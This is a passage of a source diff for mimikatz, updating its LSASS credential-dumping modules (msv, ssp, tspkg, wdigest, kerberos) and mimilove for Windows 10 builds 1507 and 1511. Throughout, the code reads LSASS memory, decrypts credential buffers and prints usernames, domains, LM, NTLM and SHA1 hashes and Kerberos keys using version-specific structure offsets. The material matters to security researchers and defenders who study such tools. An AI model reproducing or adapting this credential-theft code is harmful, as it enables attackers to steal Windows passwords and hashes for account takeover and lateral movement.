else if(context->osContext.BuildNumber < KULL_M_WIN_BUILD_10_1511)
|
||||
helper = &msv1_0_primaryHelper[1];
|
||||
else
|
||||
helper = &msv1_0_primaryHelper[2];
|
||||
return helper;
|
||||
}
|
||||
@ -20,6 +20,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
BOOLEAN isIso;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10_OLD, *PMSV1_0_PRIMARY_CREDENTIAL_10_OLD;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
@ -37,6 +52,19 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_HELPER {
|
||||
LONG offsetToLogonDomain;
|
||||
LONG offsetToUserName;
|
||||
LONG offsetToisIso;
|
||||
LONG offsetToisNtOwfPassword;
|
||||
LONG offsetToisLmOwfPassword;
|
||||
LONG offsetToisShaOwPassword;
|
||||
LONG offsetToNtOwfPassword;
|
||||
LONG offsetToLmOwfPassword;
|
||||
LONG offsetToShaOwPassword;
|
||||
LONG offsetToIso;
|
||||
} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
|
||||
|
||||
typedef struct _MARSHALL_KEY {
|
||||
DWORD unkId;
|
||||
USHORT unk0;
|
||||
@ -72,4 +100,6 @@ BOOL CALLBACK kuhl_m_sekurlsa_enum_callback_msv_pth(IN PKIWI_BASIC_SECURITY_LOGO
|
||||
|
||||
VOID kuhl_m_sekurlsa_msv_enum_cred(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN PVOID pCredentials, IN PKUHL_M_SEKURLSA_MSV_CRED_CALLBACK credCallback, IN PVOID optionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_std(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
BOOL CALLBACK kuhl_m_sekurlsa_msv_enum_cred_callback_pth(IN PKUHL_M_SEKURLSA_CONTEXT cLsass, IN struct _KIWI_MSV1_0_PRIMARY_CREDENTIALS * pCredentials, IN DWORD AuthenticationPackageId, IN PKULL_M_MEMORY_ADDRESS origBufferAddress, IN OPTIONAL LPVOID pOptionalData);
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper(PKUHL_M_SEKURLSA_CONTEXT context);
|
||||
@ -12,7 +12,7 @@ BYTE PTRN_WIN10_SspCredentialList[] = {0xc7, 0x46, 0x24, 0x43, 0x72, 0x64, 0x41,
|
||||
KULL_M_PATCH_GENERIC SspReferences[] = {
|
||||
{KULL_M_WIN_BUILD_XP, {sizeof(PTRN_WIN5_SspCredentialList), PTRN_WIN5_SspCredentialList}, {0, NULL}, {16}},
|
||||
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_SspCredentialList), PTRN_WIN6_SspCredentialList}, {0, NULL}, {20}},
|
||||
{KULL_M_WIN_BUILD_10, {sizeof(PTRN_WIN10_SspCredentialList), PTRN_WIN10_SspCredentialList}, {0, NULL}, {16}},
|
||||
{KULL_M_WIN_BUILD_10_1507, {sizeof(PTRN_WIN10_SspCredentialList), PTRN_WIN10_SspCredentialList}, {0, NULL}, {16}},
|
||||
};
|
||||
#elif defined _M_IX86
|
||||
BYTE PTRN_WALL_SspCredentialList[] = {0x1c, 0x43, 0x72, 0x64, 0x41, 0xff, 0x15};
|
||||
@ -34,8 +34,7 @@ NTSTATUS kuhl_m_sekurlsa_ssp(int argc, wchar_t * argv[])
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_ssp(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KIWI_SSP_CREDENTIAL_LIST_ENTRY mesCredentials;
|
||||
KULL_M_MEMORY_HANDLE hBuffer = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &hBuffer}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aBuffer = {&mesCredentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsass = {NULL, pData->cLsass->hLsassMem};
|
||||
ULONG monNb = 0;
|
||||
|
||||
if(kuhl_m_sekurlsa_ssp_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_ssp_package.Module, SspReferences, ARRAYSIZE(SspReferences), (PVOID *) &SspCredentialList, NULL, NULL, NULL))
|
||||
|
||||
@ -34,9 +34,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_tspkg(IN PKIWI_BASIC_SECURITY_
|
||||
{
|
||||
KIWI_TS_CREDENTIAL credentials;
|
||||
KIWI_TS_PRIMARY_CREDENTIAL primaryCredential;
|
||||
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {&credentials, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
PVOID buffer = NULL;
|
||||
|
||||
if(kuhl_m_sekurlsa_tspkg_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_tspkg_package.Module, TsPkgReferences, ARRAYSIZE(TsPkgReferences), (PVOID *) &TSGlobalCredTable, NULL, NULL, NULL))
|
||||
|
||||
@ -39,8 +39,7 @@ NTSTATUS kuhl_m_sekurlsa_wdigest(int argc, wchar_t * argv[])
|
||||
|
||||
void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_wdigest(IN PKIWI_BASIC_SECURITY_LOGON_SESSION_DATA pData)
|
||||
{
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &hLocalMemory}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
KULL_M_MEMORY_ADDRESS aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE}, aLsassMemory = {NULL, pData->cLsass->hLsassMem};
|
||||
SIZE_T taille;
|
||||
|
||||
if(kuhl_m_sekurlsa_wdigest_package.Module.isInit || kuhl_m_sekurlsa_utils_search_generic(pData->cLsass, &kuhl_m_sekurlsa_wdigest_package.Module, WDigestReferences, ARRAYSIZE(WDigestReferences), (PVOID *) &l_LogSessList, NULL, NULL, &offsetWDigestPrimary))
|
||||
|
||||
@ -28,7 +28,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
{
|
||||
dprintf("\n\t [%08x] %Z", credentials.AuthenticationPackageId, &primaryCredentials.Primary);
|
||||
if(RtlEqualString(&primaryCredentials.Primary, &PRIMARY_STRING, FALSE))
|
||||
flags = (NtBuildNumber < KULL_M_WIN_BUILD_10) ? KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY : KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10;
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY;
|
||||
else if(RtlEqualString(&primaryCredentials.Primary, &CREDENTIALKEYS_STRING, FALSE))
|
||||
flags = KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY;
|
||||
else
|
||||
@ -48,6 +48,24 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_msv(IN ULONG_PTR reserved, IN
|
||||
}
|
||||
}
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER msv1_0_primaryHelper[] = {
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, UserName), 0, FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL, ShaOwPassword), 0},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, align0)},
|
||||
{FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LogonDomainName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, UserName), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10_OLD, isIso), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isNtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isLmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, isShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, LmOwfPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, ShaOwPassword), FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword)},
|
||||
};
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper()
|
||||
{
|
||||
const MSV1_0_PRIMARY_HELPER * helper;
|
||||
if(NtBuildNumber < KULL_M_WIN_BUILD_10_1507)
|
||||
helper = &msv1_0_primaryHelper[0];
|
||||
else if(NtBuildNumber < KULL_M_WIN_BUILD_10_1511)
|
||||
helper = &msv1_0_primaryHelper[1];
|
||||
else
|
||||
helper = &msv1_0_primaryHelper[2];
|
||||
return helper;
|
||||
}
|
||||
|
||||
const KERB_INFOS kerbHelper[] = {
|
||||
{
|
||||
FIELD_OFFSET(KIWI_KERBEROS_LOGON_SESSION, LocallyUniqueIdentifier),
|
||||
@ -117,7 +135,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
|
||||
{
|
||||
if(ReadMemory(ptr, data, (ULONG) kerbHelper[KerbOffsetIndex].structSize, NULL))
|
||||
{
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (NtBuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (data + kerbHelper[KerbOffsetIndex].offsetCreds), pData->LogonId, (NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10);
|
||||
|
||||
if(ptr = (ULONG_PTR) *(PVOID *) (data + kerbHelper[KerbOffsetIndex].offsetPin))
|
||||
if(infosCsp = (PBYTE) LocalAlloc(LPTR, kerbHelper[KerbOffsetIndex].structCspInfosSize))
|
||||
@ -145,7 +163,7 @@ void CALLBACK kuhl_m_sekurlsa_enum_logon_callback_kerberos(IN ULONG_PTR pKerbGlo
|
||||
{
|
||||
dprintf("\n\t * Key List\n");
|
||||
for(i = 0; i < keyList.cbItem; i++)
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((NtBuildNumber < KULL_M_WIN_BUILD_10) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10));
|
||||
kuhl_m_sekurlsa_genericCredsOutput((PKIWI_GENERIC_PRIMARY_CREDENTIAL) (pHashPassword + i), pData->LogonId, KUHL_SEKURLSA_CREDS_DISPLAY_KEY_LIST | ((NtBuildNumber < KULL_M_WIN_BUILD_10_1507) ? 0 : KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10));
|
||||
}
|
||||
LocalFree(pHashPassword);
|
||||
}
|
||||
|
||||
@ -27,6 +27,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10_OLD {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
BOOLEAN isIso;
|
||||
BOOLEAN isNtOwfPassword;
|
||||
BOOLEAN isLmOwfPassword;
|
||||
BOOLEAN isShaOwPassword;
|
||||
BYTE align0;
|
||||
BYTE align1;
|
||||
BYTE NtOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE LmOwfPassword[LM_NTLM_HASH_LENGTH];
|
||||
BYTE ShaOwPassword[SHA_DIGEST_LENGTH];
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10_OLD, *PMSV1_0_PRIMARY_CREDENTIAL_10_OLD;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
LSA_UNICODE_STRING LogonDomainName;
|
||||
LSA_UNICODE_STRING UserName;
|
||||
@ -44,6 +59,21 @@ typedef struct _MSV1_0_PRIMARY_CREDENTIAL_10 {
|
||||
/* buffer */
|
||||
} MSV1_0_PRIMARY_CREDENTIAL_10, *PMSV1_0_PRIMARY_CREDENTIAL_10;
|
||||
|
||||
typedef struct _MSV1_0_PRIMARY_HELPER {
|
||||
LONG offsetToLogonDomain;
|
||||
LONG offsetToUserName;
|
||||
LONG offsetToisIso;
|
||||
LONG offsetToisNtOwfPassword;
|
||||
LONG offsetToisLmOwfPassword;
|
||||
LONG offsetToisShaOwPassword;
|
||||
LONG offsetToNtOwfPassword;
|
||||
LONG offsetToLmOwfPassword;
|
||||
LONG offsetToShaOwPassword;
|
||||
LONG offsetToIso;
|
||||
} MSV1_0_PRIMARY_HELPER, *PMSV1_0_PRIMARY_HELPER;
|
||||
|
||||
const MSV1_0_PRIMARY_HELPER * kuhl_m_sekurlsa_msv_helper();
|
||||
|
||||
typedef struct _RPCE_COMMON_TYPE_HEADER {
|
||||
UCHAR Version;
|
||||
UCHAR Endianness;
|
||||
|
||||
@ -223,88 +223,62 @@ DECLARE_API(mimikatz)
|
||||
UNICODE_STRING uNull = {12, 14, L"(null)"};
|
||||
VOID kuhl_m_sekurlsa_genericCredsOutput(PKIWI_GENERIC_PRIMARY_CREDENTIAL mesCreds, PLUID luid, ULONG flags)
|
||||
{
|
||||
PUNICODE_STRING credentials, username = NULL, domain = NULL, password = NULL;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL pPrimaryCreds;
|
||||
PMSV1_0_PRIMARY_CREDENTIAL_10 pPrimaryCreds10;
|
||||
PUNICODE_STRING username = NULL, domain = NULL, password = NULL;
|
||||
PRPCE_CREDENTIAL_KEYCREDENTIAL pRpceCredentialKeyCreds;
|
||||
PKERB_HASHPASSWORD_6 pHashPassword;
|
||||
UNICODE_STRING buffer;
|
||||
PVOID base;
|
||||
DWORD type, i;
|
||||
BOOL isNull = FALSE;
|
||||
PBYTE msvCredentials;
|
||||
const MSV1_0_PRIMARY_HELPER * pMSVHelper;
|
||||
|
||||
if(mesCreds)
|
||||
{
|
||||
if(flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL)
|
||||
{
|
||||
type = flags & KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK;
|
||||
credentials = (PUNICODE_STRING) mesCreds;
|
||||
if(credentials->Buffer)
|
||||
if(msvCredentials = (PBYTE) ((PUNICODE_STRING) mesCreds)->Buffer)
|
||||
{
|
||||
if(!(flags & KUHL_SEKURLSA_CREDS_DISPLAY_NODECRYPT)/* && *lsassLocalHelper->pLsaUnprotectMemory*/)
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(((PUNICODE_STRING) mesCreds)->Buffer, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
kuhl_m_sekurlsa_nt6_LsaUnprotectMemory(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length);
|
||||
|
||||
switch(type)
|
||||
{
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY:
|
||||
pPrimaryCreds = (PMSV1_0_PRIMARY_CREDENTIAL) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds, &pPrimaryCreds->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds->UserName, &pPrimaryCreds->LogonDomainName);
|
||||
if(pPrimaryCreds->isLmOwfPassword)
|
||||
pMSVHelper = kuhl_m_sekurlsa_msv_helper();
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain), FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(msvCredentials, (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), FALSE);
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToUserName), (PUNICODE_STRING) (msvCredentials + pMSVHelper->offsetToLogonDomain));
|
||||
if(!pMSVHelper->offsetToisIso || !*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisIso))
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isNtOwfPassword)
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds->isShaOwPassword)
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10:
|
||||
pPrimaryCreds10 = (PMSV1_0_PRIMARY_CREDENTIAL_10) credentials->Buffer;
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->UserName, FALSE);
|
||||
kuhl_m_sekurlsa_utils_NlpMakeRelativeOrAbsoluteString(pPrimaryCreds10, &pPrimaryCreds10->LogonDomainName, FALSE);
|
||||
|
||||
dprintf("\n\t * Username : %wZ\n\t * Domain : %wZ", &pPrimaryCreds10->UserName, &pPrimaryCreds10->LogonDomainName);
|
||||
dprintf("\n\t * Flags : I%02x/N%02x/L%02x/S%02x", pPrimaryCreds10->isIso, pPrimaryCreds10->isNtOwfPassword, pPrimaryCreds10->isLmOwfPassword, pPrimaryCreds10->isShaOwPassword);
|
||||
if(!pPrimaryCreds10->isIso)
|
||||
{
|
||||
if(pPrimaryCreds10->isLmOwfPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisLmOwfPassword))
|
||||
{
|
||||
dprintf("\n\t * LM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->LmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToLmOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isNtOwfPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisNtOwfPassword))
|
||||
{
|
||||
dprintf("\n\t * NTLM : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->NtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToNtOwfPassword, LM_NTLM_HASH_LENGTH, 0);
|
||||
}
|
||||
if(pPrimaryCreds10->isShaOwPassword)
|
||||
if(*(PBOOLEAN) (msvCredentials + pMSVHelper->offsetToisShaOwPassword))
|
||||
{
|
||||
dprintf("\n\t * SHA1 : ");
|
||||
kull_m_string_dprintf_hex(pPrimaryCreds10->ShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
kull_m_string_dprintf_hex(msvCredentials + pMSVHelper->offsetToShaOwPassword, SHA_DIGEST_LENGTH, 0);
|
||||
}
|
||||
}
|
||||
else
|
||||
kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) ((PBYTE) pPrimaryCreds10 + FIELD_OFFSET(MSV1_0_PRIMARY_CREDENTIAL_10, NtOwfPassword) + sizeof(USHORT)));
|
||||
else kuhl_m_sekurlsa_genericLsaIsoOutput((PLSAISO_DATA_BLOB) (msvCredentials + pMSVHelper->offsetToIso + sizeof(USHORT)));
|
||||
break;
|
||||
case KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY:
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) credentials->Buffer;
|
||||
pRpceCredentialKeyCreds = (PRPCE_CREDENTIAL_KEYCREDENTIAL) msvCredentials;
|
||||
base = (PBYTE) pRpceCredentialKeyCreds + sizeof(RPCE_CREDENTIAL_KEYCREDENTIAL) + (pRpceCredentialKeyCreds->unk0 - 1) * sizeof(MARSHALL_KEY);
|
||||
for (i = 0; i < pRpceCredentialKeyCreds->unk0; i++)
|
||||
kuhl_m_sekurlsa_genericKeyOutput(&pRpceCredentialKeyCreds->key[i], &base);
|
||||
break;
|
||||
default:
|
||||
dprintf("\n\t * Raw data : ");
|
||||
kull_m_string_dprintf_hex(credentials->Buffer, credentials->Length, 1);
|
||||
kull_m_string_dprintf_hex(msvCredentials, ((PUNICODE_STRING) mesCreds)->Length, 1);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
@ -16,8 +16,7 @@ USHORT NtBuildNumber;
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL 0x08000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY 0x01000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_PRIMARY_10 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x03000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIALKEY 0x02000000
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_CREDENTIAL_MASK 0x07000000
|
||||
|
||||
#define KUHL_SEKURLSA_CREDS_DISPLAY_KERBEROS_10 0x00100000
|
||||
@ -94,7 +93,8 @@ typedef struct _PVK_FILE_HDR {
|
||||
#define KULL_M_WIN_BUILD_7 7600
|
||||
#define KULL_M_WIN_BUILD_8 9200
|
||||
#define KULL_M_WIN_BUILD_BLUE 9600
|
||||
#define KULL_M_WIN_BUILD_10 9800
|
||||
#define KULL_M_WIN_BUILD_10_1507 10240
|
||||
#define KULL_M_WIN_BUILD_10_1511 10586
|
||||
|
||||
#define KULL_M_WIN_MIN_BUILD_XP 2500
|
||||
#define KULL_M_WIN_MIN_BUILD_2K3 3000
|
||||
|
||||
@ -51,8 +51,7 @@ int wmain(int argc, wchar_t *argv[])
|
||||
BOOL kuhl_m_sekurlsa_utils_love_search(PKULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION mi, PKULL_M_MINI_PATTERN pa, PVOID * genericPtr)
|
||||
{
|
||||
BOOL status = FALSE;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, mi->DllBase.hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
KULL_M_MEMORY_SEARCH sMemory = {{{mi->DllBase.address, mi->DllBase.hMemory}, mi->SizeOfImage}, NULL};
|
||||
aLocalMemory.address = pa->Pattern;
|
||||
if(kull_m_memory_search(&aLocalMemory, pa->Length, &sMemory, FALSE))
|
||||
@ -89,8 +88,7 @@ void mimilove_lsasrv(PKULL_M_MEMORY_HANDLE hMemory)
|
||||
KULL_M_MINI_PATTERN paLsasrv = {sizeof(PTRN_W2K_LogonSessionTable), PTRN_W2K_LogonSessionTable, -9};
|
||||
PLIST_ENTRY LogonSessionTable = NULL;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miLsasrv;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PVOID baseTable, base;
|
||||
KIWI_MSV1_0_LOGON_SESSION_TABLE_50 table;
|
||||
KIWI_MSV1_0_LIST_50 list;
|
||||
@ -271,8 +269,7 @@ void mimilove_kerberos(PKULL_M_MEMORY_HANDLE hMemory)
|
||||
KULL_M_MINI_PATTERN paKerberos = {sizeof(PTRN_W2K_KerbLogonSessionList), PTRN_W2K_KerbLogonSessionList, -8};
|
||||
PLIST_ENTRY KerbLogonSessionList = NULL;
|
||||
KULL_M_PROCESS_VERY_BASIC_MODULE_INFORMATION miKerberos;
|
||||
KULL_M_MEMORY_HANDLE hLocalMemory = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &hLocalMemory};
|
||||
KULL_M_MEMORY_ADDRESS aLsassMemory = {NULL, hMemory}, aLocalMemory = {NULL, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
|
||||
PVOID base;
|
||||
BYTE hash;
|
||||
KIWI_KERBEROS_LOGON_SESSION_50 session;
|
||||
|
||||
@ -5,6 +5,8 @@
|
||||
*/
|
||||
#include "kull_m_memory.h"
|
||||
|
||||
KULL_M_MEMORY_HANDLE KULL_M_MEMORY_GLOBAL_OWN_HANDLE = {KULL_M_MEMORY_TYPE_OWN, NULL};
|
||||
|
||||
